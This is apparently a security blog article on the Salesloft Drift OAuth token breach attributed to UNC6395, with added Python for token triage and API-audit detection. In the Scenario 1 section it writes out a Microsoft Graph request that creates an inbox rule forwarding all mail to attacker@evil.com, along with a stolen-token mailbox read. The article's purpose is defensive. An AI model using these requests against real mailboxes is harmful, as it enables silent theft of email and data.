Google's Threat Intelligence Group (GTIG) has warned that the recent Salesloft Drift OAuth breach, attributed to the threat group UNC6395, is not limited to Salesforce as initially reported. Any third-party SaaS platform connected to the Drift application via OAuth should be treated as potentially exposed, which greatly widens the blast radius.
Between August 8 and 18, 2025, the attackers used stolen OAuth access and refresh tokens issued to Drift to gain unauthorized, persistent access to customer CRMs, email systems and communications platforms. The campaign fits a growing pattern: attackers are moving from password theft to OAuth token hijacking, targeting the trust chains that underpin modern SaaS ecosystems.

Technical Anatomy of the Breach
Attack Vector: OAuth Token Hijacking
- OAuth tokens let one SaaS app (Salesloft, Drift, Salesforce and so on) call another's API on a user's or tenant's behalf without the user re-entering a password.
- A compromised token gives the attacker exactly the API access the legitimate app was granted, limited only by the scopes of the grant; the API cannot tell the two callers apart.
- Access tokens are usually short-lived, but the refresh token issued with them lets the holder mint new ones for as long as the grant exists, which is what makes a stolen grant valuable for persistence.
Red Team Example:
An attacker holding a valid OAuth token issued to an app with the Mail.Read scope can call:
GET https://graph.microsoft.com/v1.0/me/messages
Authorization: Bearer <stolen_token>
→ The user's mailbox is returned. The password and MFA were checked when the user consented to the app, not on this request, so neither is prompted again, and the call produces no new sign-in for login-based alerting to see.
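As an added example (not code from the original article), the following Python helper decodes a JWT-style access token without verifying it, the way an incident responder triages a token recovered from logs, a proxy capture or a memory dump. The sample token is constructed inline with a throwaway HMAC key so the script runs offline; the app id, user and scopes in it are invented. It shows what the token already carries: the consented app, the granted scopes, whether a refresh token accompanied it (offline_access), and that the MFA result is frozen into the token at issuance, which is why the API never prompts for it again.

```python
import base64
import hashlib
import hmac
import json

# Throwaway key used only so the constructed sample has the three-part JWT shape.
# Real Graph tokens are RS256-signed by Entra ID; an analyst triaging a recovered
# token has no key to verify with and does not need one to read the claims.
_SAMPLE_KEY = b"not-a-real-signing-key"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_sample_token(issued_at: int, lifetime_s: int) -> str:
    """Build a constructed Entra-style delegated access token (every value invented)."""
    header = {"typ": "JWT", "alg": "HS256"}
    payload = {
        "aud": "https://graph.microsoft.com",
        "iss": "https://sts.windows.net/00000000-0000-0000-0000-000000000000/",
        "iat": issued_at, "nbf": issued_at, "exp": issued_at + lifetime_s,
        "appid": "11111111-2222-3333-4444-555555555555",   # hypothetical SaaS app id
        "upn": "alice@example.com",
        "scp": "Mail.Read Mail.ReadWrite MailboxSettings.ReadWrite offline_access",
        "amr": ["pwd", "mfa"],                              # how the user authenticated at consent
    }
    signing_input = _b64url(json.dumps(header).encode()) + "." + _b64url(json.dumps(payload).encode())
    sig = hmac.new(_SAMPLE_KEY, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def triage_token(token: str, now: int) -> dict:
    """Unverified decode of a JWT access token, returning the facts an IR analyst needs.

    `now` is a Unix timestamp passed in explicitly so the result is reproducible.
    Opaque tokens (Salesforce session tokens, Google access tokens) are not JWTs;
    for those, ask the issuer's token introspection endpoint instead.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT; use the issuer's token introspection endpoint")
    claims = json.loads(_b64url_decode(parts[1]))
    scopes = claims.get("scp", "").split()          # delegated permissions
    roles = claims.get("roles", [])                 # application permissions (app-only tokens)
    remaining = int(claims.get("exp", 0)) - now
    return {
        "app_id": claims.get("appid") or claims.get("azp"),
        "subject": claims.get("upn") or claims.get("oid"),
        "audience": claims.get("aud"),
        "kind": "app-only" if roles and not scopes else "delegated",
        "permissions": scopes or roles,
        "seconds_remaining": remaining,
        "expired": remaining <= 0,
        # offline_access means a refresh token was issued with this access token: the
        # holder can mint new access tokens until the grant itself is revoked.
        "refreshable": "offline_access" in scopes,
        # amr is fixed at issuance; the resource API never re-evaluates MFA per request.
        "mfa_at_issuance": "mfa" in claims.get("amr", []),
        "can_alter_mailbox": any(s.startswith(("Mail.ReadWrite", "MailboxSettings")) for s in scopes),
    }


if __name__ == "__main__":
    tok = make_sample_token(issued_at=1_755_000_000, lifetime_s=3600)
    print(json.dumps(triage_token(tok, now=1_755_000_000 + 600), indent=2))
```

The useful output for an investigation is not the expiry but `refreshable` and `permissions`: an access token with ten minutes left is harmless once it lapses, whereas a grant with offline_access and mailbox-write scopes stays usable until someone revokes it.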
Expanding Beyond Salesforce
- Salesloft, working with Salesforce, revoked the Drift app's tokens and disabled the Salesforce integration after unusual API activity was observed in customer Salesforce instances.
- Google later confirmed the compromise was not confined to Salesforce: a small number of Google Workspace accounts were accessed through the Drift Email integration, and any platform connected to Drift via OAuth (CRMs, email, messaging tools) may have been exposed. GTIG's guidance is to treat every authentication token stored in or connected to the Drift platform as potentially compromised.
Drift Exploitation Connection
- Drift is Salesloft's conversational-marketing product, and the stolen tokens were the ones issued to the Drift application; the abuse ran through the same August 8 to 18 window.
- Because a single application held OAuth grants into many customer environments, one compromise became a coordinated supply chain campaign against SaaS ecosystems through their OAuth trust chains.
Real-World Exploitation Scenarios
Scenario 1: Business Email Compromise via OAuth Tokens
- The attacker uses a stolen token whose grant carries mailbox scopes → gains API access to Gmail/Outlook mailboxes.
- They create an inbox rule that forwards every message (Microsoft Graph shown; creating rules needs the MailboxSettings.ReadWrite scope, and each forwardTo entry is a recipient object, not a bare address):
POST https://graph.microsoft.com/v1.0/me/mailFolders/inbox/messageRules
Authorization: Bearer <stolen_token>
Content-Type: application/json
{
  "displayName": "ForwardAll",
  "sequence": 1,
  "isEnabled": true,
  "actions": {
    "forwardTo": [ { "emailAddress": { "address": "attacker@evil.com" } } ],
    "stopProcessingRules": false
  }
}
→ Silent exfiltration of all incoming mail. The rule lives in the mailbox, not in the token, so it keeps forwarding even after the token is revoked unless someone removes it.
Scenario 2: CRM Data Exfiltration
- Using the token tied to the Salesforce connected app, the attacker queries customer pipeline objects (for example through SOQL queries or Bulk API exports).
- The data taken includes leads, contracts and client contact lists → sold on dark markets or used for spear-phishing, and any secrets pasted into CRM records are harvested along with them.
Scenario 3: Persistence in the Cloud
- A password change or MFA reset protects the interactive login, not the grant: tokens issued to a connected application keep working until that grant is revoked by the user, an admin or the provider.
- The attacker therefore keeps hidden access long after the initial breach, which is why the remediation below is to revoke grants rather than rotate passwords.
Lessons from the Incident
- OAuth = the new attack surface. Tokens grant API access equivalent to full login sessions but are rarely monitored.
- Supply chain blind spots. Integrations like Salesloft connect multiple SaaS platforms together, creating cascading risk.
- Detection gap. Many enterprises log user logins but fail to monitor API-based OAuth access.
Defensive Recommendations
For Enterprises
- Audit Integrations — Inventory every SaaS OAuth grant to Salesloft and Drift, and every credential stored inside Drift (mail connectors, CRM keys), including grants approved years ago.
- Revoke & Rotate Tokens — Revoke the Drift/Salesloft grants outright (access and refresh tokens) and re-consent with the minimum scopes; do not filter by the Aug 8–18 window, since a token issued earlier and stolen in that window is just as usable.
- Monitor API Activity — Flag anomalous API calls keyed by OAuth client, not just by user (e.g., mass email exports, CRM data pulls, new mailbox forwarding rules, token use from outside the integration's published IP ranges).
- Short-Lived Tokens — Where the provider allows it, set refresh-token expiry for connected apps and require periodic re-consent so a stolen grant has a bounded life.
- Conditional Access Policies — Require device posture or IP-based restrictions for token use.
For SaaS Vendors
- Built-In Token Expiry — Enforce short-lived tokens with continuous validation.
- Granular Scopes — Minimize token permissions (principle of least privilege).
- Revocation APIs — Provide customers with easy tools to revoke OAuth grants.
- Behavioral Analytics — Detect when tokens are being used in ways inconsistent with normal app behavior.
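The detections that "Monitor API Activity" (enterprise side) and "Behavioral Analytics" (vendor side) call for, together with the forwarding-rule abuse in Scenario 1, can be expressed as a few rules over API audit events keyed by OAuth client rather than by user login. The following Python is an added example, not the article's or any vendor's code: the event schema, app names, egress ranges and thresholds are assumptions, and the log lines are constructed. It flags a grant used from outside the integration's published egress ranges, an operation the integration never normally performs, bulk record pulls past a per-hour baseline, and inbox rules that forward outside the organisation.

```python
import ipaddress
import json
from collections import defaultdict
from datetime import datetime

# Constructed sample: API audit events in a vendor-neutral JSON-lines shape. The
# field names, app names and addresses are assumptions for this example only.
SAMPLE_LOG = """\
{"ts":"2025-08-12T02:10:05Z","app":"drift-email","user":"alice@example.com","ip":"203.0.113.10","action":"mail.read","count":40}
{"ts":"2025-08-12T02:11:30Z","app":"drift-email","user":"alice@example.com","ip":"198.51.100.77","action":"mail.read","count":2500}
{"ts":"2025-08-12T02:12:00Z","app":"drift-email","user":"alice@example.com","ip":"198.51.100.77","action":"mail.read","count":2500}
{"ts":"2025-08-12T02:12:41Z","app":"drift-email","user":"alice@example.com","ip":"198.51.100.77","action":"mailrule.create","count":1,"forward_to":["drop@attacker.example"]}
{"ts":"2025-08-12T02:20:00Z","app":"drift-crm","user":"svc-drift@example.com","ip":"203.0.113.11","action":"crm.query","count":800}
{"ts":"2025-08-12T02:21:00Z","app":"drift-crm","user":"svc-drift@example.com","ip":"203.0.113.11","action":"crm.query","count":900}
{"ts":"2025-08-12T02:22:00Z","app":"drift-crm","user":"svc-drift@example.com","ip":"203.0.113.11","action":"crm.query","count":950}
{"ts":"2025-08-12T09:00:00Z","app":"helpdesk","user":"bob@example.com","ip":"203.0.113.50","action":"mailrule.create","count":1,"forward_to":["bob@example.com"]}
"""

# Per-grant baseline an enterprise keeps for each OAuth app it has approved: the
# vendor's published egress ranges, the operations the integration legitimately
# performs, and how many records it normally pulls per user per hour. Assumed values.
BASELINES = {
    "drift-email": {"egress": ["203.0.113.0/24"], "actions": {"mail.read"}, "hourly_cap": 500},
    "drift-crm":   {"egress": ["203.0.113.0/24"], "actions": {"crm.query"}, "hourly_cap": 2000},
    "helpdesk":    {"egress": ["203.0.113.0/24"], "actions": {"mail.read", "mailrule.create"}, "hourly_cap": 200},
}
INTERNAL_DOMAINS = {"example.com"}


def parse_events(text: str) -> list:
    """Parse JSON-lines audit events, converting the timestamp to a datetime."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ev = json.loads(line)
            ev["ts"] = datetime.fromisoformat(ev["ts"].replace("Z", "+00:00"))
            events.append(ev)
    return events


def detect(events: list, baselines: dict = BASELINES) -> list:
    """Return (rule, (app, user), detail) alerts for OAuth-client behaviour off baseline."""
    alerts = []
    hourly = defaultdict(int)                     # records pulled per (app, user, hour)
    for ev in events:
        key = (ev["app"], ev["user"])
        base = baselines.get(ev["app"])
        if base is None:                           # a grant nobody inventoried
            alerts.append(("unknown-oauth-app", key, ev["app"]))
            continue
        ip = ipaddress.ip_address(ev["ip"])
        if not any(ip in ipaddress.ip_network(cidr) for cidr in base["egress"]):
            alerts.append(("token-used-off-egress", key, ev["ip"]))
        if ev["action"] not in base["actions"]:    # token used for something the app never does
            alerts.append(("scope-drift", key, ev["action"]))
        bucket = key + (ev["ts"].replace(minute=0, second=0, microsecond=0),)
        before = hourly[bucket]
        hourly[bucket] += ev["count"]
        if before <= base["hourly_cap"] < hourly[bucket]:   # fire once per hour, on crossing
            alerts.append(("bulk-export", key, hourly[bucket]))
        for addr in ev.get("forward_to", []):      # inbox rule forwarding outside the org
            if addr.rsplit("@", 1)[-1].lower() not in INTERNAL_DOMAINS:
                alerts.append(("external-forward-rule", key, addr))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

Keying every rule by the OAuth client is the point: the login-centric view sees alice as a normal user who signed in once, while the grant-centric view sees her mailbox being read in bulk from an address the vendor never uses, then a rule created that the integration has no business creating. The helpdesk event shows the same rule type staying quiet when the forward stays internal and the app is allowed to manage rules.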
The Salesloft OAuth breach highlights the fragility of today’s SaaS trust chains. By stealing a single token, attackers bypass MFA, passwords, and user awareness — directly accessing enterprise data across multiple connected platforms.
UNC6395’s campaign proves that OAuth token hijacking is the new credential theft. Without better governance, monitoring, and architecture, OAuth breaches could become the next SolarWinds-class supply chain problem for SaaS.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.